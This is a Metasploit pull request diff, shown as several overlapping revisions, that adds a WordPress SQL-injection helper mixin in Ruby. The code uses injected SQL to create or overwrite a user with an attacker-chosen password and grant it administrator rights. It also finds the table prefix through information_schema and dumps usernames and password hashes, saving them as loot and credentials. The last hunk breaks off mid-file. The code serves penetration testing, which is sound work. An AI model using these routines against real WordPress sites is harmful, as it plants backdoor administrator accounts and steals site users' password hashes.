### PR TITLE
Add Msf::Exploit::Remote::HTTP::Wordpress::SQLi

### DIFF
--- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb
+++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb
@@ -114,7 +114,7 @@ module Msf
         return nil
       end
 
-      print_status("{WPSQLi} Custom table prefix detected: '#{prefix}'")
+      vprint_status("{WPSQLi} Custom table prefix detected: '#{prefix}'")
 
       prefix
     end

--- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb
+++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb
@@ -192,7 +192,7 @@ module Msf
         info: description.strip
       )
 
-      print_good('{WPSQLi} Reporting completed successfully.')
+      vprint_good('{WPSQLi} Reporting completed successfully.')
 
       return data
     end

--- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb
+++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb
@@ -92,7 +92,7 @@ module Msf
         vprint_status("{WPSQLi} Retrieved default table prefix: 'wp_'")
         return 'wp_'
       end
-      print_status('{WPSQLi} Default prefix not found, attempting to detect custom table prefix...')
+      vprint_status('{WPSQLi} Default prefix not found, attempting to detect custom table prefix...')
 
       query = <<-SQL
         SELECT LEFT(table_name, LENGTH(table_name) - LENGTH('users'))

--- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb
+++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb
@@ -182,7 +182,7 @@ module Msf
         info: description.strip
       )
 
-      print_status('{WPSQLi} Reporting vulnerability...')
+      vprint_status('{WPSQLi} Reporting vulnerability...')
       report_vuln(
         host: datastore['RHOST'],
         port: datastore['RPORT'],

--- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb
+++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb
@@ -134,7 +134,7 @@ module Msf
       data = @sqli.dump_table_fields("#{table_prefix}users", columns, '', count)
 
       table = Rex::Text::Table.new(
-        'Header' => 'wp_users',
+        'Header' => "#{table_prefix}users",
         'Indent' => 4,
         'Columns' => columns
       )

--- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb
+++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb
@@ -18,7 +18,7 @@ module Msf
     # @param sqli [Object] The SQLi instance initialized in the exploit module.
     # @return [void]
 
-    def wordpress_sqli_initialize_sqli(sqli)
+    def wordpress_sqli_initialize(sqli)
       @sqli = sqli
     end
 
@@ -36,20 +36,20 @@ module Msf
     # @return [void]
     def wordpress_sqli_create_user(username, password, email, table_prefix)
       user_query = <<-SQL
-            INSERT INTO #{table_prefix}users (user_login, user_pass, user_nicename, user_email, user_registered, user_status, display_name)
-            SELECT '#{username}', MD5('#{password}'), '#{username}', '#{email}', NOW(), 0, '#{username}'
-            FROM DUAL
-            WHERE NOT EXISTS (SELECT 1 FROM #{table_prefix}users WHERE user_login = '#{username}')
-            LIMIT 1
+              INSERT INTO #{table_prefix}users (user_login, user_pass, user_nicename, user_email, user_registered, user_status, display_name)
+              SELECT '#{username}', MD5('#{password}'), '#{username}', '#{email}', NOW(), 0, '#{username}'
+              FROM DUAL
+              WHERE NOT EXISTS (SELECT 1 FROM #{table_prefix}users WHERE user_login = '#{username}')
+              LIMIT 1
       SQL
 
       update_query = <<-SQL
-            UPDATE #{table_prefix}users
-            SET user_pass = MD5('#{password}'),
-                user_nicename = '#{username}',
-                user_email = '#{email}',
-                display_name = '#{username}'
-            WHERE user_login = '#{username}'
+              UPDATE #{table_prefix}users
+              SET user_pass = MD5('#{password}'),
+                  user_nicename = '#{username}',
+                  user_email = '#{email}',
+                  display_name = '#{username}'
+              WHERE user_login = '#{username}'
       SQL
 
       @sqli.raw_run_sql(user_query.strip.gsub(/\s+/, ' '))
@@ -70,13 +70,13 @@ module Msf
     # @return [void]
     def wordpress_sqli_grant_admin_privileges(username, table_prefix)
       admin_query = <<-SQL
-            INSERT INTO #{table_prefix}usermeta (user_id, meta_key, meta_value)
-            VALUES (
-              (SELECT ID FROM #{table_prefix}users WHERE user_login = '#{username}'),
-              '#{table_prefix}capabilities', 'a:1:{s:13:"administrator";s:1:"1";}'
-            )
-            ON DUPLICATE KEY UPDATE
-            meta_value = 'a:1:{s:13:"administrator";s:1:"1";}'
+              INSERT INTO #{table_prefix}usermeta (user_id, meta_key, meta_value)
+              VALUES (
+                (SELECT ID FROM #{table_prefix}users WHERE user_login = '#{username}'),
+                '#{table_prefix}capabilities', 'a:1:{s:13:"administrator";s:1:"1";}'
+              )
+              ON DUPLICATE KEY UPDATE
+              meta_value = 'a:1:{s:13:"administrator";s:1:"1";}'
       SQL
 
       @sqli.raw_run_sql(admin_query.strip.gsub(/\s+/, ' '))
@@ -97,17 +97,17 @@ module Msf
       else
         print_status('{WPSQLi} Default prefix not found, attempting to detect custom table prefix...')
         query = <<-SQL
-              SELECT LEFT(table_name, LENGTH(table_name) - LENGTH('users')) AS prefix
-              FROM information_schema.tables
-              WHERE table_schema = database()
-                AND table_name LIKE '%\\_users'
-                AND (SELECT COUNT(*)
-                     FROM information_schema.columns c
-                     WHERE c.table_schema = tables.table_schema
-                       AND c.table_name = tables.table_name
-                       AND c.column_name IN ('user_login', 'user_pass')
-                    ) = 2
-              LIMIT 1
+                SELECT LEFT(table_name, LENGTH(table_name) - LENGTH('users')) AS prefix
+                FROM information_schema.tables
+                WHERE table_schema = database()
+                  AND table_name LIKE '%\\_users'
+                  AND (SELECT COUNT(*)
+                       FROM information_schema.columns c
+                       WHERE c.table_schema = tables.table_schema
+                         AND c.table_name = tables.table_name
+                         AND c.column_name IN ('user_login', 'user_pass')
+                      ) = 2
+                LIMIT 1
         SQL
 
         prefix = @sqli.run_sql(query.strip.gsub(/\s+/, ' '))
@@ -127,9 +127,10 @@ module Msf
     # Get users' credentials from the wp_users table
     #
     # @param table_prefix [String] The prefix of the WordPress database tables
+    # @param ip [String] The target IP address
     # @param count [Integer] The number of users to retrieve (default: 10)
     # @return [Array<Array>] Array of arrays containing user login and password hash
-    def wordpress_sqli_get_users_credentials(table_prefix, count = 10)
+    def wordpress_sqli_get_users_credentials(table_prefix, ip, count = 10)
       columns = ['user_login', 'user_pass']
       data = @sqli.dump_table_fields("#{table_prefix}users", columns, '', count)
 
@@ -139,10 +140,12 @@ module Msf
         'Columns' => columns
       )
 
+      loot_data = ''
       data.each do |user|
         table << user
+        loot_data << "Username: #{user[0]}, Password Hash: #{user[1]}\n"
 
-        Metasploit::Credential::Creation.create_credential({
+        create_credential({
           workspace_id: myworkspace_id,
           origin_type: :service,
           module_fullname: fullname,
@@ -160,6 +163,17 @@ module Msf
 
       print_status('{WPSQLi} Dumped user data:')
       print_line(table.to_s)
+
+      loot_path = store_loot(
+        'wordpress.users',
+        'text/plain',
+        ip,
+        loot_data,
+        'wp_users.txt',
+        'WordPress Usernames and Password Hashes'
+      )
+
+      print_good("Loot saved to: #{loot_path}")
 
       return data
     end

--- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb
+++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb
@@ -1,3 +1,5 @@
+# -*- coding: binary -*-
+
 module Msf
   # This module provides reusable SQLi (SQL Injection) helper functions
   # for WordPress exploits in Metasploit Framework. These functions allow

--- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb
+++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb
@@ -50,7 +50,7 @@ module Msf
           display_name = '#{username}'
       SQL
 
-      @sqli.raw_run_sql(query.strip.gsub(/\n/, ' ').gsub(/\s+/, ' '))
+      @sqli.raw_run_sql(query.strip.gsub(/\s+/, ' '))
 
       print_status("{WPSQLi} User '#{username}' created or updated successfully.")
     end
@@ -83,7 +83,8 @@ module Msf
     # @return [String] The detected table prefix
     # @raise [Failure::UnexpectedReply] If the table prefix could not be detected
     def wordpress_sqli_identify_table_prefix
-      indicator = rand()
+      indicator = rand(0..19)
+      random_alias = Rex::Text.rand_text_alpha(1..5)
       default_prefix_check = "SELECT #{indicator} FROM information_schema.tables WHERE table_name = 'wp_users'"
       result = @sqli.run_sql(default_prefix_check)&.to_i
 
@@ -92,18 +93,19 @@ module Msf
         return 'wp_'
       end
       print_status('{WPSQLi} Default prefix not found, attempting to detect custom table prefix...')
+
       query = <<-SQL
-          SELECT LEFT(table_name, LENGTH(table_name) - LENGTH('users')) AS prefix
-          FROM information_schema.tables
-          WHERE table_schema = database()
-            AND table_name LIKE '%\\_users'
-            AND (SELECT COUNT(*)
-                  FROM information_schema.columns c
-                  WHERE c.table_schema = tables.table_schema
-                    AND c.table_name = tables.table_name
-                    AND c.column_name IN ('user_login', 'user_pass')
-                ) = 2
-          LIMIT 1
+        SELECT LEFT(table_name, LENGTH(table_name) - LENGTH('users'))
+        FROM information_schema.tables
+        WHERE table_schema = database()
+          AND table_name LIKE '%\\_users'
+          AND (SELECT COUNT(*)
+                FROM information_schema.columns #{random_alias}
+                WHERE #{random_alias}.table_schema = tables.table_schema
+                  AND #{random_alias}.table_name = tables.table_name
+                  AND #{random_alias}.column_name IN ('user_login', 'user_pass')
+              ) = 2
+        LIMIT 1
       SQL
 
       prefix = @sqli.run_sql(query.strip.gsub(/\s+/, ' '))

--- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb
+++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb
@@ -50,7 +50,7 @@ module Msf
           display_name = '#{username}'
       SQL
 
-      @sqli.raw_run_sql(query.strip.gsub(/\s+/, ' '))
+      @sqli.raw_run_sql(query.strip.gsub(/\n/, ' ').gsub(/\s+/, ' '))
 
       print_status("{WPSQLi} User '#{username}' created or updated successfully.")
     end

--- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb
+++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb
@@ -36,20 +36,20 @@ module Msf
     # @return [void]
     def wordpress_sqli_create_user(username, password, email, table_prefix)
       user_query = <<-SQL
-          INSERT INTO #{table_prefix}users (user_login, user_pass, user_nicename, user_email, user_registered, user_status, display_name)
-          SELECT '#{username}', MD5('#{password}'), '#{username}', '#{email}', NOW(), 0, '#{username}'
-          FROM DUAL
-          WHERE NOT EXISTS (SELECT 1 FROM #{table_prefix}users WHERE user_login = '#{username}')
-          LIMIT 1
+            INSERT INTO #{table_prefix}users (user_login, user_pass, user_nicename, user_email, user_registered, user_status, display_name)
+            SELECT '#{username}', MD5('#{password}'), '#{username}', '#{email}', NOW(), 0, '#{username}'
+            FROM DUAL
+            WHERE NOT EXISTS (SELECT 1 FROM #{table_prefix}users WHERE user_login = '#{username}')
+            LIMIT 1
       SQL
 
       update_query = <<-SQL
-          UPDATE #{table_prefix}users
-          SET user_pass = MD5('#{password}'),
-              user_nicename = '#{username}',
-              user_email = '#{email}',
-              display_name = '#{username}'
-          WHERE user_login = '#{username}'
+            UPDATE #{table_prefix}users
+            SET user_pass = MD5('#{password}'),
+                user_nicename = '#{username}',
+                user_email = '#{email}',
+                display_name = '#{username}'
+            WHERE user_login = '#{username}'
       SQL
 
       @sqli.raw_run_sql(user_query.strip.gsub(/\s+/, ' '))
@@ -70,13 +70,13 @@ module Msf
     # @return [void]
     def wordpress_sqli_grant_admin_privileges(username, table_prefix)
       admin_query = <<-SQL
-          INSERT INTO #{table_prefix}usermeta (user_id, meta_key, meta_value)
-          VALUES (
-            (SELECT ID FROM #{table_prefix}users WHERE user_login = '#{username}'),
-            '#{table_prefix}capabilities', 'a:1:{s:13:"administrator";s:1:"1";}'
-          )
-          ON DUPLICATE KEY UPDATE
-          meta_value = 'a:1:{s:13:"administrator";s:1:"1";}'
+            INSERT INTO #{table_prefix}usermeta (user_id, meta_key, meta_value)
+            VALUES (
+              (SELECT ID FROM #{table_prefix}users WHERE user_login = '#{username}'),
+              '#{table_prefix}capabilities', 'a:1:{s:13:"administrator";s:1:"1";}'
+            )
+            ON DUPLICATE KEY UPDATE
+            meta_value = 'a:1:{s:13:"administrator";s:1:"1";}'
       SQL
 
       @sqli.raw_run_sql(admin_query.strip.gsub(/\s+/, ' '))
@@ -97,17 +97,17 @@ module Msf
       else
         print_status('{WPSQLi} Default prefix not found, attempting to detect custom table prefix...')
         query = <<-SQL
-            SELECT LEFT(table_name, LENGTH(table_name) - LENGTH('users')) AS prefix
-            FROM information_schema.tables
-            WHERE table_schema = database()
-              AND table_name LIKE '%\\_users'
-              AND (SELECT COUNT(*)
-                   FROM information_schema.columns c
-                   WHERE c.table_schema = tables.table_schema
-                     AND c.table_name = tables.table_name
-                     AND c.column_name IN ('user_login', 'user_pass')
-                  ) = 2
-            LIMIT 1
+              SELECT LEFT(table_name, LENGTH(table_name) - LENGTH('users')) AS prefix
+              FROM information_schema.tables
+              WHERE table_schema = database()
+                AND table_name LIKE '%\\_users'
+                AND (SELECT COUNT(*)
+                     FROM information_schema.columns c
+                     WHERE c.table_schema = tables.table_schema
+                       AND c.table_name = tables.table_name
+                       AND c.column_name IN ('user_login', 'user_pass')
+                    ) = 2
+              LIMIT 1
         SQL
 
         prefix = @sqli.run_sql(query.strip.gsub(/\s+/, ' '))
@@ -142,7 +142,7 @@ module Msf
       data.each do |user|
         table << user
 
-        create_credential({
+        Metasploit::Credential::Creation.create_credential({
           workspace_id: myworkspace_id,
           origin_type: :service,
           module_fullname: fullname,

--- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb
+++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb
@@ -9,6 +9,7 @@ module Msf
   #   the provided functions to simplify SQL injection logic.
   module Exploit::Remote::HTTP::Wordpress::SQLi
     include Msf::Exploit::SQLi
+
     # Function to initialize the SQLi instance in the mixin.
     #
     # This function sets up the SQLi instance that is initialized in the exploit module.
@@ -17,7 +18,6 @@ module Msf
     #
     # @param sqli [Object] The SQLi instance initialized in the exploit module.
     # @return [void]
-
     def wordpress_sqli_initialize(sqli)
       @sqli = sqli
       @prefix = wordpress_sqli_identify_table_prefix
@@ -157,7 +157,7 @@ module Msf
       loot_path = store_loot(
         'wordpress.users',
         'text/plain',
-        ip,
+        datastore['RHOST'],
         loot_data,
         'wp_users.txt',
         'WordPress Usernames and Password Hashes'

--- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb
+++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb
@@ -1,5 +1,3 @@
-# -*- coding: binary -*-
-
 module Msf
   # This module provides reusable SQLi (SQL Injection) helper functions
   # for WordPress exploits in Metasploit Framework. These functions allow
@@ -154,6 +152,8 @@ module Msf
           protocol: 'tcp',
           status: Metasploit::Model::Login::Status::UNTRIED
         })
+
+        print_good("{WPSQLi} Credential for user '#{user[0]}' created successfully.")
       end
 
       print_status('{WPSQLi} Dumped user data:')
@@ -169,6 +169,30 @@ module Msf
       )
 
       print_good("Loot saved to: #{loot_path}")
+
+      print_status('{WPSQLi} Reporting host...')
+      report_host(host: datastore['RHOST'])
+
+      print_status('{WPSQLi} Reporting service...')
+      report_service(
+        host: datastore['RHOST'],
+        port: datastore['RPORT'],
+        proto: 'tcp',
+        name: fullname,
+        info: description.strip
+      )
+
+      print_status('{WPSQLi} Reporting vulnerability...')
+      report_vuln(
+        host: datastore['RHOST'],
+        port: datastore['RPORT'],
+        proto: 'tcp',
+        name: fullname,
+        refs: references,
+        info: description.strip
+      )
+
+      print_good('{WPSQLi} Reporting completed successfully.')
 
       return data
     end

--- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb
+++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb
@@ -83,10 +83,11 @@ module Msf
     # @return [String] The detected table prefix
     # @raise [Failure::UnexpectedReply] If the table prefix could not be detected
     def wordpress_sqli_identify_table_prefix
-      default_prefix_check = "SELECT 0 FROM information_schema.tables WHERE table_name = 'wp_users'"
+      indicator = rand()
+      default_prefix_check = "SELECT #{indicator} FROM information_schema.tables WHERE table_name = 'wp_users'"
       result = @sqli.run_sql(default_prefix_check)&.to_i
 
-      if result == 0
+      if result == indicator
         print_status("{WPSQLi} Retrieved default table prefix: 'wp_'")
         return 'wp_'
       end

--- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb
+++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb
@@ -89,7 +89,7 @@ module Msf
       result = @sqli.run_sql(default_prefix_check)&.to_i
 
       if result == indicator
-        print_status("{WPSQLi} Retrieved default table prefix: 'wp_'")
+        vprint_status("{WPSQLi} Retrieved default table prefix: 'wp_'")
         return 'wp_'
       end
       print_status('{WPSQLi} Default prefix not found, attempting to detect custom table prefix...')

--- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb
+++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb
@@ -156,7 +156,7 @@ module Msf
         vprint_good("{WPSQLi} Credential for user '#{user[0]}' created successfully.")
       end
 
-      print_status('{WPSQLi} Dumped user data:')
+      vprint_status('{WPSQLi} Dumped user data:')
       print_line(table.to_s)
 
       loot_path = store_loot(

--- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb
+++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb
@@ -173,7 +173,7 @@ module Msf
       print_status('{WPSQLi} Reporting host...')
       report_host(host: datastore['RHOST'])
 
-      print_status('{WPSQLi} Reporting service...')
+      vprint_status('{WPSQLi} Reporting service...')
       report_service(
         host: datastore['RHOST'],
         port: datastore['RPORT'],

--- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb
+++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb
@@ -20,6 +20,7 @@ module Msf
 
     def wordpress_sqli_initialize(sqli)
       @sqli = sqli
+      @prefix = wordpress_sqli_identify_table_prefix
     end
 
     # Inject an user into the WordPress database, creating or updating an entry.
@@ -32,28 +33,24 @@ module Msf
     # @param username [String] The username for the new or updated user.
     # @param password [String] The password for the new user (stored as an MD5 hash).
     # @param email [String] The email for the new user.
-    # @param table_prefix [String] The prefix of the WordPress database tables.
     # @return [void]
-    def wordpress_sqli_create_user(username, password, email, table_prefix)
-      user_query = <<-SQL
-              INSERT INTO #{table_prefix}users (user_login, user_pass, user_nicename, user_email, user_registered, user_status, display_name)
-              SELECT '#{username}', MD5('#{password}'), '#{username}', '#{email}', NOW(), 0, '#{username}'
-              FROM DUAL
-              WHERE NOT EXISTS (SELECT 1 FROM #{table_prefix}users WHERE user_login = '#{username}')
-              LIMIT 1
+    def wordpress_sqli_create_user(username, password, email)
+      query = <<-SQL
+        INSERT INTO #{@prefix}users (user_login, user_pass, user_nicename, user_email, user_registered, user_status, display_name)
+        SELECT '#{username}', MD5('#{password}'), '#{username}', '#{email}', user_registered, user_status, '#{username}'
+        FROM #{@prefix}users
+        WHERE NOT EXISTS (
+          SELECT 1 FROM #{@prefix}users WHERE user_login = '#{username}'
+        )
+        LIMIT 1
+        ON DUPLICATE KEY UPDATE
+          user_pass = MD5('#{password}'),
+          user_nicename = '#{username}',
+          user_email = '#{email}',
+          display_name = '#{username}'
       SQL
 
-      update_query = <<-SQL
-              UPDATE #{table_prefix}users
-              SET user_pass = MD5('#{password}'),
-                  user_nicename = '#{username}',
-                  user_email = '#{email}',
-                  display_name = '#{username}'
-              WHERE user_login = '#{username}'
-      SQL
-
-      @sqli.raw_run_sql(user_query.strip.gsub(/\s+/, ' '))
-      @sqli.raw_run_sql(update_query.strip.gsub(/\s+/, ' '))
+      @sqli.raw_run_sql(query.strip.gsub(/\s+/, ' '))
 
       print_status("{WPSQLi} User '#{username}' created or updated successfully.")
     end
@@ -66,17 +63,15 @@ module Msf
     # If the entry does not exist, a new one will be created.
     #
     # @param username [String] The username of the user to grant privileges to.
-    # @param table_prefix [String] The prefix of the WordPress database tables.
     # @return [void]
-    def wordpress_sqli_grant_admin_privileges(username, table_prefix)
+    def wordpress_sqli_grant_admin_privileges(username)
       admin_query = <<-SQL
-              INSERT INTO #{table_prefix}usermeta (user_id, meta_key, meta_value)
-              VALUES (
-                (SELECT ID FROM #{table_prefix}users WHERE user_login = '#{username}'),
-                '#{table_prefix}capabilities', 'a:1:{s:13:"administrator";s:1:"1";}'
-              )
-              ON DUPLICATE KEY UPDATE
-              meta_value = 'a:1:{s:13:"administrator";s:1:"1";}'
+        INSERT INTO #{@prefix}usermeta (user_id, meta_key, meta_value)
+        SELECT ID, '#{@prefix}capabilities', 'a:1:{s:13:"administrator";s:1:"1";}'
+        FROM #{@prefix}users
+        WHERE user_login = '#{username}'
+        ON DUPLICATE KEY UPDATE
+          meta_value = 'a:1:{s:13:"administrator";s:1:"1";}'
       SQL
 
       @sqli.raw_run_sql(admin_query.strip.gsub(/\s+/, ' '))
@@ -92,50 +87,45 @@ module Msf
       result = @sqli.run_sql(default_prefix_check)&.to_i
 
       if result == 0
-        prefix = 'wp_'
         print_status("{WPSQLi} Retrieved default table prefix: 'wp_'")
-      else
-        print_status('{WPSQLi} Default prefix not found, attempting to detect custom table prefix...')
-        query = <<-SQL
-                SELECT LEFT(table_name, LENGTH(table_name) - LENGTH('users')) AS prefix
-                FROM information_schema.tables
-                WHERE table_schema = database()
-                  AND table_name LIKE '%\\_users'
-                  AND (SELECT COUNT(*)
-                       FROM information_schema.columns c
-                       WHERE c.table_schema = tables.table_schema
-                         AND c.table_name = tables.table_name
-                         AND c.column_name IN ('user_login', 'user_pass')
-                      ) = 2
-                LIMIT 1
-        SQL
-
-        prefix = @sqli.run_sql(query.strip.gsub(/\s+/, ' '))
-        unless prefix && !prefix.strip.empty?
-          print_error('{WPSQLi} Unable to detect the table prefix.')
-          return nil
-        end
-
-        prefix.strip!
-        prefix << '_' unless prefix.end_with?('_')
-        print_status("{WPSQLi} Custom table prefix detected: '#{prefix}'")
+        return 'wp_'
       end
+      print_status('{WPSQLi} Default prefix not found, attempting to detect custom table prefix...')
+      query = <<-SQL
+          SELECT LEFT(table_name, LENGTH(table_name) - LENGTH('users')) AS prefix
+          FROM information_schema.tables
+          WHERE table_schema = database()
+            AND table_name LIKE '%\\_users'
+            AND (SELECT COUNT(*)
+                  FROM information_schema.columns c
+                  WHERE c.table_schema = tables.table_schema
+                    AND c.table_name = tables.table_name
+                    AND c.column_name IN ('user_login', 'user_pass')
+                ) = 2
+          LIMIT 1
+      SQL
+
+      prefix = @sqli.run_sql(query.strip.gsub(/\s+/, ' '))
+      unless prefix && !prefix.strip.empty?
+        print_error('{WPSQLi} Unable to detect the table prefix.')
+        return nil
+      end
+
+      print_status("{WPSQLi} Custom table prefix detected: '#{prefix}'")
 
       prefix
     end
 
     # Get users' credentials from the wp_users table
     #
-    # @param table_prefix [String] The prefix of the WordPress database tables
-    # @param ip [String] The target IP address
     # @param count [Integer] The number of users to retrieve (default: 10)
     # @return [Array<Array>] Array of arrays containing user login and password hash
-    def wordpress_sqli_get_users_credentials(table_prefix, ip, count = 10)
+    def wordpress_sqli_get_users_credentials(count = 10)
       columns = ['user_login', 'user_pass']
-      data = @sqli.dump_table_fields("#{table_prefix}users", columns, '', count)
+      data = @sqli.dump_table_fields("#{@prefix}users", columns, '', count)
 
       table = Rex::Text::Table.new(
-        'Header' => "#{table_prefix}users",
+        'Header' => "#{@prefix}users",
         'Indent' => 4,
         'Columns' => columns
       )
@@ -154,7 +144,7 @@ module Msf
           jtr_format: Metasploit::Framework::Hashes.identify_hash(user[1]),
           private_data: user[1],
           service_name: 'WordPress',
-          address: ip,
+          address: datastore['RHOST'],
           port: datastore['RPORT'],
           protocol: 'tcp',
           status: Metasploit::Model::Login::Status::UNTRIED

--- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb
+++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb
@@ -75,7 +75,7 @@ module Msf
       SQL
 
       @sqli.raw_run_sql(admin_query.strip.gsub(/\s+/, ' '))
-      print_status("{WPSQLi} Admin privileges granted or updated for user '#{username}'.")
+      vprint_status("{WPSQLi} Admin privileges granted or updated for user '#{username}'.")
     end
 
     # Identify the table prefix for the WordPress installation

--- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb
+++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb
@@ -170,7 +170,7 @@ module Msf
 
       print_good("Loot saved to: #{loot_path}")
 
-      print_status('{WPSQLi} Reporting host...')
+      vprint_status('{WPSQLi} Reporting host...')
       report_host(host: datastore['RHOST'])
 
       vprint_status('{WPSQLi} Reporting service...')

--- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb
+++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb
@@ -153,7 +153,7 @@ module Msf
           status: Metasploit::Model::Login::Status::UNTRIED
         })
 
-        print_good("{WPSQLi} Credential for user '#{user[0]}' created successfully.")
+        vprint_good("{WPSQLi} Credential for user '#{user[0]}' created successfully.")
       end
 
       print_status('{WPSQLi} Dumped user data:')

--- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb
+++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb
@@ -52,7 +52,7 @@ module Msf
 
       @sqli.raw_run_sql(query.strip.gsub(/\s+/, ' '))
 
-      print_status("{WPSQLi} User '#{username}' created or updated successfully.")
+      vprint_status("{WPSQLi} User '#{username}' created or updated successfully.")
     end
 
     # Grant admin privileges to the specified user by creating or updating the appropriate meta entry.

--- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb
+++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb
@@ -1,0 +1,167 @@
+module Msf
+  # This module provides reusable SQLi (SQL Injection) helper functions
+  # for WordPress exploits in Metasploit Framework. These functions allow
+  # for actions such as creating new users, granting privileges, and
+  # dumping user credentials via SQL injection vulnerabilities in WordPress.
+  #
+  # Usage:
+  #   Include this module in your exploit or auxiliary module and use
+  #   the provided functions to simplify SQL injection logic.
+  module Exploit::Remote::HTTP::Wordpress::SQLi
+    include Msf::Exploit::SQLi
+    # Function to initialize the SQLi instance in the mixin.
+    #
+    # This function sets up the SQLi instance that is initialized in the exploit module.
+    # The SQLi instance is passed as a parameter to ensure it is accessible within the mixin
+    # and can be used for executing SQL injection queries.
+    #
+    # @param sqli [Object] The SQLi instance initialized in the exploit module.
+    # @return [void]
+
+    def wordpress_sqli_initialize_sqli(sqli)
+      @sqli = sqli
+    end
+
+    # Inject an user into the WordPress database, creating or updating an entry.
+    #
+    # This method either creates a new user entry in the 'users' table or updates an existing one.
+    # If the user already exists, their password, nicename, email, and display name will be updated.
+    # Otherwise, a new user will be created with the provided credentials and default values.
+    # The password is hashed using MD5 for compatibility with older WordPress versions.
+    #
+    # @param username [String] The username for the new or updated user.
+    # @param password [String] The password for the new user (stored as an MD5 hash).
+    # @param email [String] The email for the new user.
+    # @param table_prefix [String] The prefix of the WordPress database tables.
+    # @return [void]
+    def wordpress_sqli_create_user(username, password, email, table_prefix)
+      user_query = <<-SQL
+          INSERT INTO #{table_prefix}users (user_login, user_pass, user_nicename, user_email, user_registered, user_status, display_name)
+          SELECT '#{username}', MD5('#{password}'), '#{username}', '#{email}', NOW(), 0, '#{username}'
+          FROM DUAL
+          WHERE NOT EXISTS (SELECT 1 FROM #{table_prefix}users WHERE user_login = '#{username}')
+          LIMIT 1
+      SQL
+
+      update_query = <<-SQL
+          UPDATE #{table_prefix}users
+          SET user_pass = MD5('#{password}'),
+              user_nicename = '#{username}',
+              user_email = '#{email}',
+              display_name = '#{username}'
+          WHERE user_login = '#{username}'
+      SQL
+
+      @sqli.raw_run_sql(user_query.strip.gsub(/\s+/, ' '))
+      @sqli.raw_run_sql(update_query.strip.gsub(/\s+/, ' '))
+
+      print_status("{WPSQLi} User '#{username}' created or updated successfully.")
+    end
+
+    # Grant admin privileges to the specified user by creating or updating the appropriate meta entry.
+    #
+    # This method either creates a new entry in the 'usermeta' table or updates an existing one
+    # to grant administrator capabilities to the specified user. If the entry for the user's
+    # capabilities already exists, it will be updated to assign administrator privileges.
+    # If the entry does not exist, a new one will be created.
+    #
+    # @param username [String] The username of the user to grant privileges to.
+    # @param table_prefix [String] The prefix of the WordPress database tables.
+    # @return [void]
+    def wordpress_sqli_grant_admin_privileges(username, table_prefix)
+      admin_query = <<-SQL
+          INSERT INTO #{table_prefix}usermeta (user_id, meta_key, meta_value)
+          VALUES (
+            (SELECT ID FROM #{table_prefix}users WHERE user_login = '#{username}'),
+            '#{table_prefix}capabilities', 'a:1:{s:13:"administrator";s:1:"1";}'
+          )
+          ON DUPLICATE KEY UPDATE
+          meta_value = 'a:1:{s:13:"administrator";s:1:"1";}'
+      SQL
+
+      @sqli.raw_run_sql(admin_query.strip.gsub(/\s+/, ' '))
+      print_status("{WPSQLi} Admin privileges granted or updated for user '#{username}'.")
+    end
+
+    # Identify the table prefix for the WordPress installation
+    #
+    # @return [String] The detected table prefix
+    # @raise [Failure::UnexpectedReply] If the table prefix could not be detected
+    def wordpress_sqli_identify_table_prefix
+      default_prefix_check = "SELECT 0 FROM information_schema.tables WHERE table_name = 'wp_users'"
+      result = @sqli.run_sql(default_prefix_check)&.to_i
+
+      if result == 0
+        prefix = 'wp_'
+        print_status("{WPSQLi} Retrieved default table prefix: 'wp_'")
+      else
+        print_status('{WPSQLi} Default prefix not found, attempting to detect custom table prefix...')
+        query = <<-SQL
+            SELECT LEFT(table_name, LENGTH(table_name) - LENGTH('users')) AS prefix
+            FROM information_schema.tables
+            WHERE table_schema = database()
+              AND table_name LIKE '%\\_users'
+              AND (SELECT COUNT(*)
+                   FROM information_schema.columns c
+                   WHERE c.table_schema = tables.table_schema
+                     AND c.table_name = tables.table_name
+                     AND c.column_name IN ('user_login', 'user_pass')
+                  ) = 2
+            LIMIT 1
+        SQL
+
+        prefix = @sqli.run_sql(query.strip.gsub(/\s+/, ' '))
+        unless prefix && !prefix.strip.empty?
+          print_error('{WPSQLi} Unable to detect the table prefix.')
+          return nil
+        end
+
+        prefix.strip!
+        prefix << '_' unless prefix.end_with?('_')
